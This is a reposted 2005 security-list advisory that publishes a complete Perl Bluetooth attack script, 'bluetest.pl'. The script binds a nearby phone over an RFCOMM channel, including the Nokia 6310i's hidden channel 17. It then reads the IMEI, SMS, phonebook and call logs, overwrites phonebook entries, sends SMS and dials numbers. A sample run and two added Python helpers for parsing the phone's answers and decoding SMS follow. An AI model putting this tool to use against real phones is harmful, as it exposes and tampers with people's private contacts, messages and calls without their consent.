Category: LINUX

2010-05-05 23:33:42

[TOOL] BlueTest - Bluetooth Scanner

From: SecuriTeam (support_at_securiteam.com)
To: list@securiteam.com
Date: 18 Jul 2005 17:20:26 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  BlueTest - Bluetooth Scanner
------------------------------------------------------------------------

SUMMARY

BlueTest (bluetest.pl) is a Perl script that scans for Bluetooth devices with hcitool, binds a chosen phone to /dev/rfcomm0 and then reads and writes phone data (device information, phonebook, SMS, call lists) through GSM AT commands, and can place a call. It was written against a Nokia 6310i.

DETAILS

Pierre Kroma wrote a tool that scans for Bluetooth devices and talks to a selected phone over an RFCOMM serial channel:

What can it do?
1. Search for devices
2. Ping a device (optional)
3. Bind a device (e.g. a 6310i) to /dev/rfcomm0
4. Extract device information (manufacturer, model, software revision, IMEI)
5. Extract/manipulate phonebook entries
6. Extract/manipulate SMS entries (only the Nokia 6310i is supported)
7. Extract dialled numbers, missed calls, received calls
8. Make a call (hangs up after 20 seconds)

What do you need to run it?
1. A mobile device/phone (example: Nokia 6310i)
2. Perl plus the modules Device::Gsm, Getopt::Std, Term::ReadLine,
   Device::Modem and Term::ANSIColor
3. A Bluetooth adapter (example: Linksys USBBT100)
4. Start the script as root (you need root to bind a device to /dev/rfcomm0)

Tool:
#!/usr/bin/perl
#
# bluetest.pl - bluetooth hacking tool
#
# written by pierre kroma
# kroma@syss.de
#
# Scans for Bluetooth devices with hcitool, binds the chosen phone to
# /dev/rfcomm0 (an RFCOMM serial channel) and then talks GSM AT commands
# to it through Device::Gsm / Device::Modem.

use strict;
use warnings;

use Device::Gsm;
use Getopt::Std;
use Term::ReadLine;
use Device::Modem;
use Term::ANSIColor;

############## U S A G E ##################
# -b and -c take an argument (address, channel), the others are flags
my %args;
getopts("b:c:psv", \%args);

system("clear");
print "\nBluetooth Pentester\n";
print "written by pierre kroma (kroma\@syss.de)\n\n";

if (!defined $args{s}) {
    print qq~
Usage: perl bluetest.pl -s { -b addr -c channel -p -v }
        -b addr    = hardware address of the target bluetooth device
                     (example: 00:11:22:33:44:55)
        -c channel = RFCOMM channel (default: 17)
        -p         = ping the remote device
        -s         = start the script
        -v         = be verbose

~;
    exit;
}

# rfcomm bind and l2ping both need root
die "You must be root to bind a device at /dev/rfcomm0!\n" if $> != 0;

################# D E F I N I T I O N ##########
# tools
my $hcitool   = "/usr/bin/hcitool";
my $l2ping    = "/usr/bin/l2ping";
my $rfcomm    = "/usr/bin/rfcomm";
my $lsusb     = "/usr/sbin/lsusb";
my $hciconfig = "/usr/sbin/hciconfig";
my $bluefw    = "/sbin/bluefw";

# variables shared by the subroutines
my $bluedev = "hci0";      # local HCI adapter
my $rfdev   = "rfcomm0";   # RFCOMM tty the phone is bound to (/dev/rfcomm0)
my $bt_addr = 0;
my $channel = $args{c};
my $i       = 0;
my ($modem, $gsm, $term);  # raw modem handle, Device::Gsm handle, prompt
my ($start, $max);         # phonebook entry range for list_entries()

########## S U B R O U T I N E S #################

sub init_adapter {
    my $busnum = "";
    my $devnum = "";
    # busid 0a12:0001 = linksys USBBT100 usb bluetooth stick (CSR chip)
    my $id = `$lsusb 2>/dev/null | grep 0a12:0001`;
    # more generic
    # my $id = `$lsusb 2>/dev/null | grep -i bluetooth`;

    if ($id =~ /Bus (\d{3}) Device (\d{3}): ID 0a12:0001/) {
        $busnum = $1;
        $devnum = $2;
        # load the stick's firmware, then bring the HCI device up
        system("$bluefw usb $busnum/$devnum");
        system("$hciconfig $bluedev up");
        select(undef, undef, undef, 1.5);   # sleep() only takes whole seconds
    }
}

sub init_modem {
    # second handle on the same serial device, used for raw AT commands
    $modem = new Device::Modem(port => '/dev/rfcomm0');
    if ($modem->connect(baudrate => 9600)) {
        # print "connected!\n";
    } else {
        print "sorry, cannot connect to your serial port!\n";
    }
    # turn off the local echo
    $modem->echo(0);
}

# Send one AT command over the raw modem handle and return the answer
# without CR and the final OK; optionally also strip LF and a leading
# "+XXXX" result prefix. This is the clean-up the original repeated
# after every atsend()/answer() pair.
sub at_query {
    my ($cmd, $prefix, $keep_newlines) = @_;
    $modem->atsend($cmd . Device::Modem::CR);
    my $answer = $modem->answer();
    $answer = '' unless defined $answer;
    $answer =~ s/\r//g;
    $answer =~ s/\n//g unless $keep_newlines;
    $answer =~ s/OK//g;
    $answer =~ s/\Q$prefix\E//g if defined $prefix;
    return $answer;
}

sub searching {
    print color 'bold blue';
    print "search devices\n";
    print color 'reset';
    my @scan = `$hcitool scan | grep -v "Scanning"`;
    foreach my $line (@scan) {
        print $i++;
        print $line;
    }
    print "\n";
}

sub selecting {
    # the prompt is needed later on as well (readbook, writebook, ...)
    $term = new Term::ReadLine 'bluetooth address reader';

    # select a device
    if ($args{b}) {
        $bt_addr = $args{b};
    } else {
        my $prompt = "Enter hw-addr (example: 00:11:22:33:44:55): ";
        $bt_addr = $term->readline($prompt);
    }
    # the address ends up on a shell command line: accept only a BD_ADDR
    die "invalid bluetooth address\n"
        unless defined $bt_addr && $bt_addr =~ /^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$/;
}

sub ping {
    # ping the remote device
    if ($args{p}) {
        print color 'bold blue';
        print "\nping the remote device $bt_addr\n";
        print color 'reset';
        die "You must be root to use l2ping!\n" if $> != 0;
        system("$l2ping -c 5 $bt_addr");
    }
}

sub binding {
    # binding a device
    print color 'bold blue';
    print "\n\nbind a device to $bt_addr \t\t";
    print color 'reset';
    if ($args{c}) {
        $channel = $args{c};
    } else {
        # setting default nokia 6310i hidden channel 17 or 18
        $channel = 17;
    }
    die "invalid RFCOMM channel: $channel\n" unless $channel =~ /^\d{1,2}$/;

    system("$rfcomm release $rfdev 2>/dev/null");
    sleep(2);
    system("$rfcomm bind $rfdev $bt_addr $channel 2>/dev/null");
    sleep(2);

    # Connect to the mobile phone
    # for devfs
    # $gsm = new Device::Gsm( port => '/dev/bluetooth/rfcomm/0' );

    # for udev
    $gsm = new Device::Gsm(port => '/dev/rfcomm0');

    if ($gsm->connect()) {
        print color 'bold green';
        print "connected!\n";
        print color 'reset';
    } else {
        print color 'bold red';
        print "sorry, no connection with gsm phone on serial port!\n";
        print color 'reset';
        exit(1);
    }

    # Register to GSM network
    $gsm->register();
}

sub manu {
    # Extract the manufacturer
    my $man_name = $gsm->manufacturer();
    print "manufacturer: $man_name \n";
}

sub model {
    my $model = $gsm->model();
    print "model: $model \n";
}

sub sw {
    # software revision (AT+CGMR); the 6310i answers with several lines,
    # so keep the line breaks
    my $rev = at_query('AT+CGMR', undef, 1);
    print "software revision: \n \n $rev";
    sleep(1);
}

sub imei {
    # Extract the IMEI number
    my $imei = $gsm->imei();
    $imei =~ s/\r//g;
    $imei =~ s/OK//g;
    print "IMEI: (International Mobile Equipment Identifier) = $imei \n\n";
}

sub readbook {
    print color 'bold blue';
    print "\n\nextract the phonebook\n\n";
    print color 'reset';
    if ($args{v}) {
        print "storagelocation:";
        print qq~
ME => storage: device
SM => storage: SIM-card
MT => combination of ME + SM (doesn't work FOR MY 6310i)
BM => storage: CB-news
~;
    }

    # AT+CPMS=? lists the message storages, AT+CPBS? the active phonebook
    print "\nsupported storage location";
    my $types = at_query('AT+CPMS=?', '+CPMS');
    print "$types \n";

    print "\ncurrent phonebooksource";
    my $source = at_query('AT+CPBS?', '+CPBS');
    print $source;
    print "\n\n";

    print "\ncurrent used storage on device";
    at_query('AT+CPBS="ME"');
    my $memory = at_query('AT+CPBS?', '+CPBS');
    print $memory;

    print "\ncurrent used storage on SIM";
    at_query('AT+CPBS="SM"');
    $source = at_query('AT+CPBS?', '+CPBS');
    print $source;
    print "\n\n";

    my $type = $term->readline("What do you want to readout? (ME oder SM) : ");
    # the answer is spliced into an AT command: allow only a storage name
    die "unknown storage location\n"
        unless defined $type && $type =~ /^(ME|SM|MT|BM)$/;
    my $asource = at_query(qq{AT+CPBS="$type"});
    print $asource;

    $start = $term->readline("starting from entry (>=0): \t ");
    print "\n";
    $max = $term->readline("ending to entry:\t\t");
    print "\n";

    unless (defined $start && defined $max
            && $start =~ /^\d+$/ && $max =~ /^\d+$/
            && $start > 0 && $start <= $max) {
        print "oops damn f*cking long night? \n";
        print "initial value <= 0? \n";
        print "or initial value > final value? \n";
        exit(1);
    }
    list_entries();

    # DC, MC and RC are the dialled/missed/received call lists
    print "\nextract last 5 dialled numbers: \n";
    print at_query('AT+CPBS="DC"');
    $start = 1;
    $max   = 5;
    list_entries();

    print "\nlast 5 missed calls: \n";
    print at_query('AT+CPBS="MC"');
    $start = 1;
    $max   = 5;
    list_entries();

    print "\nlast 5 received calls: \n";
    print at_query('AT+CPBS="RC"');
    $start = 1;
    $max   = 5;
    list_entries();
}

sub list_entries {
    foreach my $n ($start .. $max) {
        my $entry = at_query("AT+CPBR=$n");

        # parse
        # type = 145 = international format = number starts with +
        # type = 129 = unknown number format = didn't start with +
        my ($pos, $num, $type, $tag) =
            $entry =~ m/^\+CPBR: ($n),"(.+?)",(\d+),"(.*?)"$/;

        if (!defined $num || $num eq '') {
            # the phone answers a bare OK for an empty slot
            print "entry $n: is empty \n";
        } else {
            $type =~ s/145/international/g;
            $type =~ s/129/unknown/g;
            print "entry $n: $num, $type, $tag \n";
        }
    }
}

sub sendsms {
    # Send a text message quickly
    print color 'bold blue';
    print "\n\nwrite a message (SMS)\n";
    print color 'reset';
    print "\n";
    my $recipient = $term->readline("recipient (example +4912345678): ");
    print "\n";
    my $message = $term->readline("message: ");

    my $status = $gsm->send_sms(
        recipient => $recipient,
        content   => $message
    );
    if ($status) {
        print color 'bold green';
        print "\nmessage transmitted successfully.\n";
        print color 'reset';
    } else {
        print color 'bold red';
        print "\nERROR: message couldn't be delivered.\n";
        print color 'reset';
    }
    sleep(2);
}

sub readsms {
    # Get list of Device::Gsm::Sms message objects
    # see `examples/read_messages.pl' for all details

    print color 'bold blue';
    print "\nSMS Menu";
    print color 'reset';
    # get mode status
    print "\n \ncurrent sms status (0=PDU, 1=text)";
    print at_query('AT+CMGF?', '+CMGF');
    sleep(2);

    # switch to text mode (does not work with 6310i)
    # print "switch to text mode \n";
    # print at_query('AT+CMGF=1');

    # list all stored messages (4 = "ALL" in PDU mode); the 6310i stays in
    # PDU mode, so what comes back are raw hex PDUs
    print "\n\nextract all sms \n";
    my $extract = at_query('AT+CMGL=4', '+CMGL:', 1);
    sleep(2);
    print $extract;
}

sub call {
    # read number
    print color 'bold blue';
    print "\n\nmaking a call\n";
    print color 'reset';
    print "\n";
    my $number = $term->readline("Which number should be called? (example: 004970714078560): ");
    die "not a phone number\n" unless defined $number && $number =~ /^\+?\d+$/;
    print "\ncalling $number \n";
    my $max = 20;

    # dial() blocks while the call is set up, so the hangup after $max
    # seconds is done by a forked child
    my $pid = fork;
    die "fork failed: $!\n" unless defined $pid;
    if ($pid) {
        $modem->dial($number);
        waitpid($pid, 0);
    } else {
        print "waiting $max seconds before ring off: ";
        foreach my $n (1 .. $max) {
            print "$n ";
            sleep(1);
        }
        print "\n";
        $modem->hangup();
        exit(0);    # the child must not run the rest of the script
    }
}

sub writebook {
    print color 'bold blue';
    print "\ncreate a phonebook entry";
    print color 'reset';
    print "\n";
    my $nr = $term->readline("storage space number (ATTENTION: you may overwrite an existing entry:): ");
    print "\n";
    my $tel = $term->readline("phone-number (format +49123456789): ");
    print "\n";
    my $name = $term->readline("name: ");
    print "\n";
    my $place = $term->readline("storage location (ME=device, SM=SIM): ");

    # everything below is spliced into AT+CPBW=<index>,<number>,<type>,<text>:
    # keep it to what the phone expects, a quote or CR in the name would
    # end the command early
    die "invalid entry number\n"     unless defined $nr    && $nr    =~ /^\d+$/;
    die "invalid phone number\n"     unless defined $tel   && $tel   =~ /^\+?\d+$/;
    die "invalid name\n"             unless defined $name  && $name  !~ /["\r\n]/;
    die "invalid storage location\n" unless defined $place && $place =~ /^(ME|SM)$/;
    # 145 = international (+...), 129 = unknown format
    my $toa = $tel =~ /^\+/ ? 145 : 129;

    at_query(qq{AT+CPBS="$place"});
    my $source = at_query(qq{AT+CPBW=$nr,"$tel",$toa,"$name"});
    print $source;

    print "\n\nchecking......";
    $start = $nr - 5;
    $start = 1 if $start < 1;
    $max = $nr + 5;
    print "\n extract your phonebook from storage space number $start to $max \n";
    list_entries();
    print "\n";
}

sub key {
    my $message = "- press any key -";
    $term->readline($message);
}

sub final {
    #system ('cat ./logo.txt');
    print color 'bold red';
    print "\t\t\t\twritten by pierre kroma (kroma\@syss.de)\n\n";
    print color 'reset';
    $modem->disconnect();
    print "\n";
}

############### M A I N ################

init_adapter();
searching();
selecting();
ping();
binding();
init_modem();
print color 'bold blue';
print "\nextract device information\n";
print color 'reset';
manu();
model();
sw();
imei();
key();
readsms();
sendsms();
key();
readbook();
writebook();
key();
call();
key();
final();
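The script cleans every modem answer with s/OK//g and similar substitutions and splices prompt input straight into the AT+CPBS and AT+CPBW command strings. The following Python is an added example, not part of Pierre Kroma's tool and not Device::Modem code, of the same phonebook dialogue done with a real response parser: it separates information lines from the final result code (OK, ERROR, +CME ERROR), parses +CPBS and +CPBR, tells an empty slot apart from an error, and refuses input that would break out of the quoted AT+CPBW string. The modem transcript, the FakeModem class and the function names are constructed for the example.

```python
import re

# Final result codes (V.250 / 3GPP TS 27.007) that terminate a modem answer.
_FINAL = re.compile(r'^(OK|ERROR|\+CM[ES] ERROR: .+|NO CARRIER|BUSY)$')

# Type-of-address values the script translates in list_entries().
TOA_LABEL = {145: 'international', 129: 'unknown'}

# Constructed transcript of what a phone could answer to the script's AT
# commands, CR/LF framed as a modem sends it (not captured from a 6310i).
SAMPLE = {
    'AT+CPBS?':     '\r\n+CPBS: "SM",16,100\r\n\r\nOK\r\n',
    'AT+CPBS="SM"': '\r\nOK\r\n',
    'AT+CPBR=19':   '\r\nOK\r\n',                                   # empty slot
    'AT+CPBR=20':   '\r\n+CPBR: 20,"+49110",145,"SySS-Hotline"\r\n\r\nOK\r\n',
    'AT+CPBR=21':   '\r\n+CPBR: 21,"22444",129,"D2-Wetterinfo"\r\n\r\nOK\r\n',
    'AT+CPBR=101':  '\r\n+CME ERROR: 21\r\n',                        # invalid index
}


def split_response(raw):
    """Split a raw answer into (information lines, final result code).

    The script strips OK with s/OK//g, which also eats the letters OK
    inside a phonebook name and cannot tell OK from +CME ERROR."""
    lines = [l.strip() for l in raw.split('\r\n') if l.strip()]
    if not lines or not _FINAL.match(lines[-1]):
        raise ValueError('no final result code in %r' % raw)
    return lines[:-1], lines[-1]


def parse_cpbs(line):
    """+CPBS: "SM",16,100  ->  active storage, entries used, entries total."""
    m = re.match(r'\+CPBS: "(\w+)"(?:,(\d+),(\d+))?$', line)
    if not m:
        raise ValueError('unexpected +CPBS line: %r' % line)
    used, total = m.group(2), m.group(3)
    return {'storage': m.group(1),
            'used': int(used) if used else None,
            'total': int(total) if total else None}


def parse_cpbr(line):
    """+CPBR: 20,"+49110",145,"SySS-Hotline"  ->  one phonebook entry."""
    m = re.match(r'\+CPBR: (\d+),"([^"]*)",(\d+),"([^"]*)"$', line)
    if not m:
        raise ValueError('unexpected +CPBR line: %r' % line)
    toa = int(m.group(3))
    return {'index': int(m.group(1)), 'number': m.group(2),
            'type': TOA_LABEL.get(toa, str(toa)), 'name': m.group(4)}


def at_string(value):
    """Quote a prompt-supplied value for an AT command. The script
    interpolates readline() input unchecked; a double quote or CR in the
    name would end the string or the command early."""
    if re.search(r'["\r\n]', value):
        raise ValueError('illegal character in %r' % value)
    return '"%s"' % value


def build_cpbw(index, number, name):
    """AT+CPBW=<index>,<number>,<type>,<text>, as the script's writebook()
    sends it, but with the type derived from the number."""
    if not re.fullmatch(r'\+?\d{1,20}', number):
        raise ValueError('not a phone number: %r' % number)
    toa = 145 if number.startswith('+') else 129
    return 'AT+CPBW=%d,%s,%d,%s' % (int(index), at_string(number),
                                    toa, at_string(name))


class FakeModem:
    """Answers from a transcript; stands in for the rfcomm0 serial port."""
    def __init__(self, transcript):
        self.transcript = transcript

    def command(self, cmd):
        return self.transcript.get(cmd, '\r\nERROR\r\n')


def read_phonebook(modem, storage, start, end):
    """AT+CPBS=<storage>, then AT+CPBR=<i> per slot, like readbook() and
    list_entries(), but telling empty slots apart from errors."""
    _, status = split_response(modem.command('AT+CPBS="%s"' % storage))
    if status != 'OK':
        raise RuntimeError('cannot select storage %s: %s' % (storage, status))
    entries = {}
    for i in range(start, end + 1):
        info, status = split_response(modem.command('AT+CPBR=%d' % i))
        if status != 'OK':
            entries[i] = status            # e.g. +CME ERROR: 21, invalid index
        elif not info:
            entries[i] = None              # bare OK: the slot is empty
        else:
            entries[i] = parse_cpbr(info[0])
    return entries


if __name__ == '__main__':
    modem = FakeModem(SAMPLE)
    info, _ = split_response(modem.command('AT+CPBS?'))
    print('current phonebook source:', parse_cpbs(info[0]))
    for i, entry in read_phonebook(modem, 'SM', 19, 21).items():
        print('entry %d:' % i, 'is empty' if entry is None else entry)
    print(build_cpbw(19, '+49666666', 'Callgirl'))
```

Against a real phone, FakeModem.command() would be replaced by a write of the command plus CR to /dev/rfcomm0 followed by a read until one of the final result codes arrives; the parsing above stays the same.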

Example results:
###
# test: #
###

Bluetooth Pentester
written by pierre kroma (kroma@syss.de)

search devices
0 00:60:57:XX:XX:XX Exploit

Enter hw-addr (example: 00:11:22:33:44:55): 00:60:57:XX:XX:XX

bind a device to 00:60:57:XX:XX:XX connected!

extract device information
manufacturer: Nokia
model: Nokia 6310i
software revision:

 V 5.51
08-07-03
NPL-1
(c) NMP.

IMEI: (International Mobile Equipment Identifier) = XXXXXXXXXXXXXXXX

- press any key -

SMS Menu

current sms status (0=PDU, 1=text): 0

extract all sms
 1,1,,159
0791971 ----------- c u t ---------------- ( ;-) )

write a message (SMS)

recipient (example +4912345678): +491727777777
message: SMILE

message transmitted successfully.

extract the phonebook

supported storage location: ("ME","SM"),("ME","SM"),("MT")

current phonebooksource: "SM",16,100

current used storage on device: "ME",9,500
current used storage on SIM: "SM",16,100

What do you want to readout? (ME oder SM) : SM
starting from entry (>=0): 18
ending to entry: 30

entry 18: is empty
entry 19: is empty
entry 20: +49110, international, SySS-Hotline
entry 21: +4917222442, international, D2-Blumengruss
entry 22: +4917222334, international, D2-Events
entry 23: +4911880, international, Telefonauskunft
entry 24: +4917222333, international, D2-Hotelservice
entry 25: 22444, unknown, D2-Wetterinfo
entry 26: 222222, unknown, D2-ADAC Pannenhilf
entry 27: +4917222330, international, D2-Reiseservice
entry 28: 22666, unknown, D2-PassoVoice
entry 29: 22922, unknown, D2-Konto-Server
entry 30: 22933, unknown, D2-HandyBrse

extract last 5 dialled numbers:
entry 1: 012334566, unknown,
entry 2: 0123454566, unknown,
entry 3: 09345739857, unknown,
entry 4: 09287429184, unknown,
entry 5: +49123456789, international,

last 5 missed calls:
entry 1: +49110, international,
entry 2: +4919222, international,
entry 3: +49112, international,
entry 4: is empty
entry 5: is empty

last 5 received calls:
entry 1: is empty
entry 2: +4970714078560, international,
entry 3: +4900001111111, international,
entry 4: +4911111111111, international,
entry 5: +49123456789, international,

create a phonebook entry
storage space number (ATTENTION: you may overwrite an existing entry:): 19
phone-number (format +49123456789): +49666666
name: Callgirl

storage location (ME=device, SM=SIM): SM

checking......
 extract your phonebook from storage space number 14 to 24
entry 14: is empty
entry 15: is empty
entry 16: is empty
entry 17: is empty
entry 18: is empty
entry 19: +49666666, international, Callgirl
entry 20: +49110, international, SySS-Hotline
entry 21: +4917222442, international, D2-Blumengruss
entry 22: +4917222334, international, D2-Events
entry 23: +4911880, international, Telefonauskunft
entry 24: +4917222333, international, D2-Hotelservice

making a call
Which number should be called? (example: 004970714078560): 004970714078560
calling 004970714078560
waiting 20 seconds before ring off: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
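Because text mode (AT+CMGF=1) is not available on the 6310i, the "extract all sms" step above returns each message as a hex PDU: a "+CMGL: 1,1,,159" header (159 = TPDU length in octets) followed by a line starting 0791... The following Python is an added example, not part of the original tool, of decoding such an SMS-DELIVER PDU: it splits the SMSC part from the TPDU, checks the TPDU octet count against the +CMGL header, unswaps the semi-octet addresses and timestamp, and unpacks the 7-bit GSM default alphabet (UCS-2 is handled too, 8-bit data is left as hex). The +CMGL transcript and the PDU are constructed for the example, a five-character message from +4917222442 timestamped with this advisory's date; they are not a captured message and the SMSC number is invented.

```python
import re

# GSM 03.38 default alphabet, basic table (the 0x1B escape to the
# extension table is not expanded here).
GSM7 = ('@£$¥èéùìòÇ\nØø\rÅåΔ_ΦΓΛΩΠΨΣΘΞ\x1bÆæßÉ'
        ' !"#¤%&\'()*+,-./0123456789:;<=>?'
        '¡ABCDEFGHIJKLMNOPQRSTUVWXYZÄÖÑÜ§'
        '¿abcdefghijklmnopqrstuvwxyzäöñüà')

# Constructed AT+CMGL=4 answer: one SMS-DELIVER of 23 TPDU octets, 7-bit
# text from +4917222442 via an invented SMSC, stamped 2005-07-18 17:20:26
# +02:00. Not a captured message.
SAMPLE_CMGL = ('\r\n+CMGL: 1,1,,23\r\n'
               '0791942143658709040A91947122422400005070817102628005D366925904\r\n'
               '\r\nOK\r\n')


def swap_digits(hexstr):
    """Semi-octet BCD: two digits per byte, low nibble first, F pads."""
    swapped = ''.join(hexstr[i + 1] + hexstr[i] for i in range(0, len(hexstr), 2))
    return swapped.rstrip('F')


def unpack_7bit(data, septets):
    """Unpack GSM 7-bit characters packed LSB first into octets."""
    bits = int.from_bytes(data, 'little')
    return ''.join(GSM7[(bits >> (7 * k)) & 0x7F] for k in range(septets))


def decode_sms_deliver(pdu_hex):
    """Decode one SMS-DELIVER PDU as returned by AT+CMGL in PDU mode."""
    pdu_hex = pdu_hex.upper()
    raw = bytes.fromhex(pdu_hex)

    # SMSC: <octets> <TOA> <digits>; the octet count includes the TOA byte
    smsc_len = raw[0]
    smsc = ''
    if smsc_len:
        smsc = ('+' if raw[1] == 0x91 else '') + swap_digits(pdu_hex[4:2 + 2 * smsc_len])
    pos = 1 + smsc_len                      # the TPDU starts here
    tpdu_len = len(raw) - pos

    first = raw[pos]
    if first & 0x03 != 0:
        raise ValueError('TP-MTI %d is not SMS-DELIVER' % (first & 0x03))
    if first & 0x40:
        raise ValueError('user data header present, not handled here')
    pos += 1

    # TP-OA: <digit count> <TOA> <digits>; the count is in digits, not octets
    oa_digits, toa = raw[pos], raw[pos + 1]
    oa_bytes = (oa_digits + 1) // 2
    sender = ('+' if toa == 0x91 else '') + \
        swap_digits(pdu_hex[2 * (pos + 2):2 * (pos + 2 + oa_bytes)])
    pos += 2 + oa_bytes

    pid, dcs = raw[pos], raw[pos + 1]
    pos += 2

    # TP-SCTS: YY MM DD hh mm ss tz as swapped semi-octets; the time zone is
    # in quarter hours with the sign in bit 3 of its first digit
    ts = swap_digits(pdu_hex[2 * pos:2 * (pos + 7)])
    pos += 7
    tz_q = (int(ts[12], 16) & 7) * 10 + int(ts[13])
    tz = '%s%02d:%02d' % ('-' if int(ts[12], 16) & 8 else '+', tz_q // 4, tz_q % 4 * 15)
    timestamp = '20%s-%s-%s %s:%s:%s %s' % (ts[0:2], ts[2:4], ts[4:6],
                                            ts[6:8], ts[8:10], ts[10:12], tz)

    udl, ud = raw[pos], raw[pos + 1:]
    if dcs & 0x0C == 0x00:                  # 7-bit default alphabet, udl = septets
        text = unpack_7bit(ud, udl)
    elif dcs & 0x0C == 0x08:                # UCS-2, udl = octets
        text = ud[:udl].decode('utf-16-be')
    else:                                   # 8-bit data, leave as hex
        text = ud[:udl].hex()

    return {'smsc': smsc, 'sender': sender, 'pid': pid, 'dcs': dcs,
            'timestamp': timestamp, 'text': text, 'tpdu_len': tpdu_len}


def parse_cmgl(answer):
    """Pair each '+CMGL: <index>,<stat>,<alpha>,<tpdu octets>' line with the
    PDU line that follows it and check the announced TPDU length."""
    lines = [l.strip() for l in answer.split('\r\n') if l.strip()]
    if not lines or lines[-1] != 'OK':
        raise ValueError('AT+CMGL answer did not end with OK')
    messages = []
    for header, pdu in zip(lines, lines[1:]):
        m = re.match(r'\+CMGL: (\d+),(\d+),[^,]*,(\d+)$', header)
        if not m:
            continue
        msg = decode_sms_deliver(pdu)
        if msg['tpdu_len'] != int(m.group(3)):
            raise ValueError('message %s: TPDU has %d octets, header says %s'
                             % (m.group(1), msg['tpdu_len'], m.group(3)))
        msg['index'], msg['stat'] = int(m.group(1)), int(m.group(2))
        messages.append(msg)
    return messages


if __name__ == '__main__':
    for msg in parse_cmgl(SAMPLE_CMGL):
        print(msg)
```

The length check matters on a real phone: AT+CMGL output is line based, and a missing or wrapped PDU line would otherwise be decoded as the next message's TPDU.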

ADDITIONAL INFORMATION

The information has been provided by Pierre Kroma.

